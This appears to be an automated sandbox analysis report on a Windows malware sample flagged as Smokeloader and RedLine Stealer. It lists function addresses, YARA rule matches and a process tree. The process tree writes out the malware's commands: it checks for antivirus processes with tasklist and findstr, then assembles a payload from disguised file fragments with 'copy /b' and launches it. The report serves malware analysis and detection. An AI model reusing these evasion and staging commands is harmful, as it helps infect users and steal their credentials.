      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1275A19_2_00C1275A
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C288EF19_2_00C288EF
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C7080219_2_00C70802
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C269A419_2_00C269A4
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C00BE019_2_00C00BE0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C4EB9519_2_00C4EB95
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1CC8119_2_00C1CC81
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C58CB119_2_00C58CB1
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C70C7F19_2_00C70C7F
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C26F1619_2_00C26F16
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BFB02019_2_00BFB020
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C132E919_2_00C132E9
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1F33919_2_00C1F339
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF94E019_2_00BF94E0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C0D45719_2_00C0D457
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C115E419_2_00C115E4
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C0F57E19_2_00C0F57E
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BFF6A019_2_00BFF6A0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF166319_2_00BF1663
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C177F319_2_00C177F3
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1DAD519_2_00C1DAD5
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C11AD819_2_00C11AD8
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00BF9C8019_2_00BF9C80
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C29C1519_2_00C29C15
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C0DD1419_2_00C0DD14
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C11EF019_2_00C11EF0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C1BF0619_2_00C1BF06
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014481D019_2_014481D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01420BD019_2_01420BD0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0149CD0019_2_0149CD00
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0148CD3019_2_0148CD30
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01420CE819_2_01420CE8
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0140D18019_2_0140D180
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014175D019_2_014175D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144743019_2_01447430
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144D7E019_2_0144D7E0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01447C6019_2_01447C60
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014F017919_2_014F0179
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144011019_2_01440110
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014AE19019_2_014AE190
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014B800019_2_014B8000
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0143803019_2_01438030
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0143408019_2_01434080
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0145631019_2_01456310
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014343D019_2_014343D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014323E019_2_014323E0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014383B019_2_014383B0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014E42C119_2_014E42C1
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014A856019_2_014A8560
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014525C019_2_014525C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014A45C019_2_014A45C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0146A59019_2_0146A590
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014804D019_2_014804D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014DA4F019_2_014DA4F0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0146274319_2_01462743
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0145C70019_2_0145C700
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014547C019_2_014547C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014666F019_2_014666F0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0148892019_2_01488920
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0145A9F019_2_0145A9F0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014F485F19_2_014F485F
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144487019_2_01444870
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144A8C019_2_0144A8C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0147A8B019_2_0147A8B0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0143EB2019_2_0143EB20
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0147CA1019_2_0147CA10
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01444D7019_2_01444D70
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01458C7019_2_01458C70
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01432C0019_2_01432C00
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144ECA019_2_0144ECA0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01440F5019_2_01440F50
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_01482FF019_2_01482FF0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014E0F9019_2_014E0F90
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014871F019_2_014871F0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0143918019_2_01439180
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144F07019_2_0144F070
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014530C019_2_014530C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014570C019_2_014570C0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0143334019_2_01433340
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014A727019_2_014A7270
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014DB20E19_2_014DB20E
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014AF2F019_2_014AF2F0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0146954019_2_01469540
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014F759519_2_014F7595
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0144F5A019_2_0144F5A0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014EF44E19_2_014EF44E
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0145143019_2_01451430
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0143D73019_2_0143D730
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014377D019_2_014377D0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014317A019_2_014317A0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0142F6F019_2_0142F6F0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_0146B6A019_2_0146B6A0
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_014336B019_2_014336B0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\78801\Later.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\9CFE.exe AC46787D7511520D8DD14CB5A094141F338CC50B3C7B8CB31E3F136F5AD871BA
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Armenia A18537B767336C9FD3265E9919034505CA376D43BD291629E0B245D66B71A2F9
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 00C01A36 appears 34 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 0143D020 appears 33 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 0143DD90 appears 131 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 01423A20 appears 63 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 00C18A60 appears 42 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 0143D480 appears 129 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 01423B20 appears 43 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 014D942B appears 31 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 01424B80 appears 73 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 014D97B0 appears 32 times
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: String function: 00C10C42 appears 70 times
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: String function: 004062A3 appears 58 times
      Source: file.exe, 00000000.00000002.2182537935.0000000002095000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOdlasig0 vs file.exe
      Source: file.exeBinary or memory string: OriginalFilenamesOdlasig0 vs file.exe
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 19.2.Later.pif.1400000.1.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 19.2.Later.pif.1400000.1.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: wjshsfa.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/58@10/6
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C5A51A GetLastError,FormatMessageW,19_2_00C5A51A
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C48BCC AdjustTokenPrivileges,CloseHandle,19_2_00C48BCC
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C4917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00C4917C
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,7_2_004044A5
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_022A209C CreateToolhelp32Snapshot,Module32First,0_2_022A209C
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeCode function: 7_2_004024FB CoCreateInstance,7_2_004024FB
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifCode function: 19_2_00C542AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,19_2_00C542AA
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wjshsfaJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9CFE.tmpJump to behavior
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Processor
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
      Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
      Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: Later.pif, 00000013.00000003.4107780307.0000000003961000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: Later.pif, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
      Source: file.exeReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wjshsfa C:\Users\user\AppData\Roaming\wjshsfa
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9CFE.exe C:\Users\user\AppData\Local\Temp\9CFE.exe
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exit
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 78801
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "rapidconfidentialityspokedrill" Thanks
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\B
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\78801\Later.pif 78801\Later.pif 78801\B
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\78801\Later.pif C:\Users\user\AppData\Local\Temp\78801\Later.pif
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9CFE.exe C:\Users\user\AppData\Local\Temp\9CFE.exeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Beastiality Beastiality.cmd & Beastiality.cmd & exitJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 78801Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "rapidconfidentialityspokedrill" Thanks Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Thanksgiving + Arnold + Daily + Mobiles + Drugs + Log + Shoes + Bd + Representations + Investment + Explore + Submissions + Bosnia + Closing + Supervisors 78801\BJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\78801\Later.pif 78801\Later.pif 78801\BJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\78801\Later.pifProcess created: C:\Users\user\AppData\Local\Temp\78801\Later.pif C:\Users\user\AppData\Local\Temp\78801\Later.pifJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\wjshsfaSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9CFE.exeSection loaded: sspicli.dllJump to behavior
